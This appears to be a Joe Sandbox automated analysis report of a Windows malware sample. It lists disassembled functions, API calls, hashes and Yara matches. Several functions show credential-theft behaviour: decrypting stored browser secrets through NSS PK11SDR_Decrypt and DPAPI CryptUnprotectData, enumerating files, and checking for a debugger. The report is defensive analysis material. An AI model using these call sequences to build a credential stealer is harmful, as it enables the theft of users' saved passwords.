Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: DestroyError$K11_$ContextPrivatePublicUtilfree$Alloc_CreateFindFlagsGeneratePairTag_ValueWithmemcpy
String ID:
API String ID: 2510822978-0
Opcode ID: 811961ff0616a50ffa423b3c37c1f15e53221884300e96281951599bd3a6c5c9
Instruction ID: d9fede38a97f37d49b170d70b6e28702bd8200ecc1777bfa1c621d29e74c16ed
Opcode Fuzzy Hash: 811961ff0616a50ffa423b3c37c1f15e53221884300e96281951599bd3a6c5c9
Instruction Fuzzy Hash: 2791C0B1918301AFE7009F69DC4570BBBE4BF84758F04892DE8999B351F739EA44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BBF1B80 Relevance: 21.4, APIs: 14, Instructions: 415networkCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BBF1BA0
PR_GetIdentitiesLayer.NSS3(?,00000000), ref: 6BBF1CBB
select.WSOCK32(00000000,?,?,?,00000000), ref: 6BBF1E6B
PR_GetIdentitiesLayer.NSS3(?,00000000,00000000,?,?,?,00000000), ref: 6BBF1EB2
__WSAFDIsSet.WSOCK32(?,?), ref: 6BBF1EC8
__WSAFDIsSet.WSOCK32(?,?,?,?), ref: 6BBF1EDB
__WSAFDIsSet.WSOCK32(?,?,?,?,?,?), ref: 6BBF1EEC
PR_IntervalToMicroseconds.NSS3(?), ref: 6BBF1F83
PR_SetError.NSS3(FFFFE897,00000000), ref: 6BBF209B
PR_Sleep.NSS3(?), ref: 6BBF20BD
WSAGetLastError.WSOCK32(00000000,?,?,?,00000000), ref: 6BBF20E5
PR_GetIdentitiesLayer.NSS3(?,00000000,00000000,?,?,?,00000000), ref: 6BBF2139
#7.WSOCK32(0000FFFF,0000FFFF,00001008,?,00000004), ref: 6BBF2153
WSAGetLastError.WSOCK32(0000FFFF,0000FFFF,00001008,?,00000004), ref: 6BBF2176

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: ErrorIdentitiesLayer$Last$IntervalMicrosecondsSleepValueselect
String ID:
API String ID: 975171332-0
Opcode ID: aae82373de1df4a928bb070327f0ae9f6ab3d40dc73d63fb6b02f5adb810b086
Instruction ID: 86b7babd2e9157a47f4e33052048b39e6f68b205070bc31dad6356644159a651
Opcode Fuzzy Hash: aae82373de1df4a928bb070327f0ae9f6ab3d40dc73d63fb6b02f5adb810b086
Instruction Fuzzy Hash: 87F1D2B1D012A48FDB25CF24CC907A9B3BDEF40754F0445E9E919AB290D37C9B8ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF90 Relevance: 16.6, APIs: 11, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040BFC3
lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02F519F8), ref: 0040BFE1
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
memcpy.MSVCRT ref: 0040C082
lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
PK11_FreeSlot.NSS3(?), ref: 0040C0D1
lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
String ID:
API String ID: 3428224297-0
Opcode ID: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
Instruction ID: c615a08a89d19efff62b5a0e6981dcd2a682f0599fa2db432923c9597831d409
Opcode Fuzzy Hash: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
Instruction Fuzzy Hash: 22417E75D0420ADBDB20CF90DD88BEEBBB9BB48340F1041A9E605A72C0DB745A84CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040D540 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,0041D746), ref: 0040D58E
StrCmpCA.SHLWAPI(?,0041DC28), ref: 0040D5DE
StrCmpCA.SHLWAPI(?,0041DC2C), ref: 0040D5F4
FindNextFileA.KERNEL32(000000FF,?), ref: 0040DB0A
FindClose.KERNEL32(000000FF), ref: 0040DB1C

Strings

\*.*, xrefs: 0040D556
[@, xrefs: 0040D562, 0040DB2A, 0040D623, 0040D5A5, 0040D626

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: [@$\*.*
API String ID: 2325840235-1445036518
Opcode ID: 3adbf3c39cad0eb9872f7084cc18746c85e5ac1ce8c3ac594479bd1a0fed019b
Instruction ID: 5086e1dd9f189559ddbff5738d7534b81ef4efc7c2da90a7a59429af0ff5c2f4
Opcode Fuzzy Hash: 3adbf3c39cad0eb9872f7084cc18746c85e5ac1ce8c3ac594479bd1a0fed019b
Instruction Fuzzy Hash: 27F1E3759142189ACB15FB61DC91EDE7739AF54304F8142DFA40A62091EF34AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6BD06BE0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BD06C2C

Part of subcall function 6BD06E90: PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6BD06BF7), ref: 6BD06EB6
Part of subcall function 6BD06E90: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6BDAFC0A,6BD06BF7), ref: 6BD06ECD
Part of subcall function 6BD06E90: ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BD06EE0
Part of subcall function 6BD06E90: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6BD06EFC
Part of subcall function 6BD06E90: PR_NewLock.NSS3 ref: 6BD06F04
Part of subcall function 6BD06E90: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD06F18
Part of subcall function 6BD06E90: PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6BD06BF7), ref: 6BD06F30
Part of subcall function 6BD06E90: PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6BD06BF7), ref: 6BD06F54

TlsGetValue.KERNEL32 ref: 6BD06D93
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6BD06BF7), ref: 6BD06FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6BD06BF7), ref: 6BD06FFD

Strings

NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6BD06FDB
NSS_SSL_CBC_RANDOM_IV, xrefs: 6BD06FF8

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Secure$Value$Lockfclosefopenftellfwrite
String ID: NSS_SSL_CBC_RANDOM_IV$NSS_SSL_REQUIRE_SAFE_NEGOTIATION
API String ID: 3032383292-3007362596
Opcode ID: 1db73862816b6e7b1fbe5da13ad5452cd2e61e3448da199192b3d7ad578f893a
Instruction ID: fbac19b784d2c5d0237a69f2b279a846c0f94bf3f9b87f772238ba9e80c5477f
Opcode Fuzzy Hash: 1db73862816b6e7b1fbe5da13ad5452cd2e61e3448da199192b3d7ad578f893a
Instruction Fuzzy Hash: 02711170548614CBEB28CF3CC5B592877E1E7E7BA4B40411AD9DB8FA91DF38A482C752

Uniqueness

Uniqueness Score: -1.00%

Function 004155A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Strings

>N@, xrefs: 004155B8, 00415614, 004155BB, 00415617

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID: >N@
API String ID: 80407269-3381801619
Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417B4E Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00418E46
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418E5B
UnhandledExceptionFilter.KERNEL32(0041C690), ref: 00418E66
GetCurrentProcess.KERNEL32(C0000409), ref: 00418E82
TerminateProcess.KERNEL32(00000000), ref: 00418E89

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
Instruction ID: 5828a94612e18b022276c58097a982c86e574ee0b254963d5fd3238681fe770b
Opcode Fuzzy Hash: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
Instruction Fuzzy Hash: 2D21C274A01304EFC721EF54F944B843BB4FB8C309F91907AE64987260E7B456868F9D

Uniqueness

Uniqueness Score: -1.00%

Function 00406C10 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660), ref: 00406C1D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C24
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00406C51
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,`v@,80000001,h0A), ref: 00406C74
LocalFree.KERNEL32(?,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C7E

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
Instruction ID: a62b9dfe9577ca48fe2f29d604933a8f18b811f44e231435f7e1fa1bbfb2df61
Opcode Fuzzy Hash: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
Instruction Fuzzy Hash: 01011275A40708BBEB20DF94CD45F9E7779EB44B05F104155F706FB2C0D670AA118BA9

Uniqueness

Uniqueness Score: -1.00%

Function 6BCE5B90 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 366COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6BCE5D55
memcpy.VCRUNTIME140(?,?,?), ref: 6BCE5D8B
PR_SetError.NSS3(FFFFD027,00000000), ref: 6BCE5F5C

Strings

UUUU, xrefs: 6BCE5FC6

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Errormemcpymemset
String ID: UUUU
API String ID: 2691834222-1798160573
Opcode ID: 4c69e0e1d5a36b49e81692582de18dc195f1e6718b24ddf566685b9d650c5427
Instruction ID: 0b27ac378e2a793cfb7719c6e5746637d99ba3191ca589f6eb8a32b364b97c2e
Opcode Fuzzy Hash: 4c69e0e1d5a36b49e81692582de18dc195f1e6718b24ddf566685b9d650c5427
Instruction Fuzzy Hash: 1AD1F570A24611CFDB14CF28C8946AA7BF1BF84315F148579E959DB281F739EA43CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004094A0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
Instruction ID: 8ba321113e6e4d0cf3898c04bf9160a1f44f8cb9f34d86efd4b3c4bff5612467
Opcode Fuzzy Hash: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
Instruction Fuzzy Hash: AA119074240308AFEB14CF64CC95FAA77B6FB89711F208059FA159B3D0C7B5AA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6BD40B40 Relevance: 4.6, APIs: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_bind_int64.NSS3(?,?,?,?), ref: 6BD40B7C
sqlite3_bind_double.NSS3 ref: 6BD40BF1
sqlite3_bind_zeroblob.NSS3(?,?,00000000), ref: 6BD40C27

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_bind_zeroblob
String ID:
API String ID: 4141409403-0
Opcode ID: 8c5cb9efafdd98e7d8f23d5a2a5a4e7d25b62f11e5beda84db0ef6bff5db5673
Instruction ID: 07376d782ab8555e0ae15efdb4e2632e2cf38ad5ae2efc7f3f780ef24e44edd4
Opcode Fuzzy Hash: 8c5cb9efafdd98e7d8f23d5a2a5a4e7d25b62f11e5beda84db0ef6bff5db5673
Instruction Fuzzy Hash: A9214872948510DFD7015F28CC01D2BB7BAEF8A7B8F098295E9941F292EB78D801D7D6

Uniqueness

Uniqueness Score: -1.00%

Function 6BCDDA40 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: FindUtil
String ID:
API String ID: 2510446611-0
Opcode ID: 2d6ec26edb58390e975acca31ca602d7f0d812c20236d3965bc39ec814c46367
Instruction ID: a92a70b724cdf236148ec02dec1a099743a0e2bd539a24b73e9402e71d1bcea5
Opcode Fuzzy Hash: 2d6ec26edb58390e975acca31ca602d7f0d812c20236d3965bc39ec814c46367
Instruction Fuzzy Hash: 0FD022762100088BCB009FB2E81049EBB97E745354B004030F50D4F514F721EB10CA82

Uniqueness

Uniqueness Score: -1.00%

Function 0041952A Relevance: 129.2, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041953E

Part of subcall function 00417247: HeapFree.KERNEL32(00000000,00000000,?,00417158,00000000,00421AC0,0041719F,?,?,?,0041720F,00421AC0,?,?,00419FD3,00421AC0), ref: 0041725D
Part of subcall function 00417247: GetLastError.KERNEL32(?,?,00417158,00000000,00421AC0,0041719F,?,?,?,0041720F,00421AC0,?,?,00419FD3,00421AC0), ref: 0041726F

_free.LIBCMT ref: 00419546
_free.LIBCMT ref: 0041954E
_free.LIBCMT ref: 00419556
_free.LIBCMT ref: 0041955E
_free.LIBCMT ref: 00419566
_free.LIBCMT ref: 0041956D
_free.LIBCMT ref: 00419575
_free.LIBCMT ref: 0041957D
_free.LIBCMT ref: 00419585
_free.LIBCMT ref: 0041958D
_free.LIBCMT ref: 00419595
_free.LIBCMT ref: 0041959D
_free.LIBCMT ref: 004195A5
_free.LIBCMT ref: 004195AD
_free.LIBCMT ref: 004195B5
_free.LIBCMT ref: 004195C0
_free.LIBCMT ref: 004195C8
_free.LIBCMT ref: 004195D0
_free.LIBCMT ref: 004195D8
_free.LIBCMT ref: 004195E0
_free.LIBCMT ref: 004195E8
_free.LIBCMT ref: 004195F0
_free.LIBCMT ref: 004195F8
_free.LIBCMT ref: 00419600
_free.LIBCMT ref: 00419608
_free.LIBCMT ref: 00419610
_free.LIBCMT ref: 00419618
_free.LIBCMT ref: 00419620
_free.LIBCMT ref: 00419628
_free.LIBCMT ref: 00419630
_free.LIBCMT ref: 00419638
_free.LIBCMT ref: 00419646
_free.LIBCMT ref: 00419651
_free.LIBCMT ref: 0041965C
_free.LIBCMT ref: 00419667
_free.LIBCMT ref: 00419672
_free.LIBCMT ref: 0041967D
_free.LIBCMT ref: 00419688
_free.LIBCMT ref: 00419693
_free.LIBCMT ref: 0041969E
_free.LIBCMT ref: 004196A9
_free.LIBCMT ref: 004196B4
_free.LIBCMT ref: 004196BF
_free.LIBCMT ref: 004196CA
_free.LIBCMT ref: 004196D5
_free.LIBCMT ref: 004196E0
_free.LIBCMT ref: 004196EB
_free.LIBCMT ref: 004196F9
_free.LIBCMT ref: 00419704
_free.LIBCMT ref: 0041970F
_free.LIBCMT ref: 0041971A
_free.LIBCMT ref: 00419725
_free.LIBCMT ref: 00419730
_free.LIBCMT ref: 0041973B
_free.LIBCMT ref: 00419746
_free.LIBCMT ref: 00419751
_free.LIBCMT ref: 0041975C
_free.LIBCMT ref: 00419767
_free.LIBCMT ref: 00419772
_free.LIBCMT ref: 0041977D
_free.LIBCMT ref: 00419788
_free.LIBCMT ref: 00419793
_free.LIBCMT ref: 0041979E
_free.LIBCMT ref: 004197AC
_free.LIBCMT ref: 004197B7
_free.LIBCMT ref: 004197C2
_free.LIBCMT ref: 004197CD
_free.LIBCMT ref: 004197D8
_free.LIBCMT ref: 004197E3
_free.LIBCMT ref: 004197EE
_free.LIBCMT ref: 004197F9
_free.LIBCMT ref: 00419804
_free.LIBCMT ref: 0041980F
_free.LIBCMT ref: 0041981A
_free.LIBCMT ref: 00419825
_free.LIBCMT ref: 00419830
_free.LIBCMT ref: 0041983B
_free.LIBCMT ref: 00419846
_free.LIBCMT ref: 00419851
_free.LIBCMT ref: 0041985F
_free.LIBCMT ref: 0041986A
_free.LIBCMT ref: 00419875
_free.LIBCMT ref: 00419880
_free.LIBCMT ref: 0041988B
_free.LIBCMT ref: 00419896

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction ID: 5df7b21d12798ad2dd02b2714939a7e9e3589bb161cd2ca89e36415dbd51ea28
Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction Fuzzy Hash: AE71E331494B009BD7633B32DD03ADA7AB27F04304F10596EB1FB20632DA3678E79A59

Uniqueness

Uniqueness Score: -1.00%

Function 6BCA8BA0 Relevance: 51.0, APIs: 17, Strings: 12, Instructions: 202COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GenerateKeyPair), ref: 6BCA8BC6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6BCA8BF4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BCA8C03

Part of subcall function 6BD8D930: PL_strncpyz.NSS3(?,?,?), ref: 6BD8D963

PR_LogPrint.NSS3(?,00000000), ref: 6BCA8C19
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6BCA8C3F
PR_LogPrint.NSS3( pPublicKeyTemplate = 0x%p,?), ref: 6BCA8C5A
PR_LogPrint.NSS3( ulPublicKeyAttributeCount = %d,?), ref: 6BCA8C73
PR_LogPrint.NSS3( pPrivateKeyTemplate = 0x%p,?), ref: 6BCA8C8C
PR_LogPrint.NSS3( ulPrivateKeyAttributeCount = %d,?), ref: 6BCA8CA7
PR_LogPrint.NSS3( phPublicKey = 0x%p,?), ref: 6BCA8CC2
PR_LogPrint.NSS3( phPrivateKey = 0x%p,?), ref: 6BCA8CE7
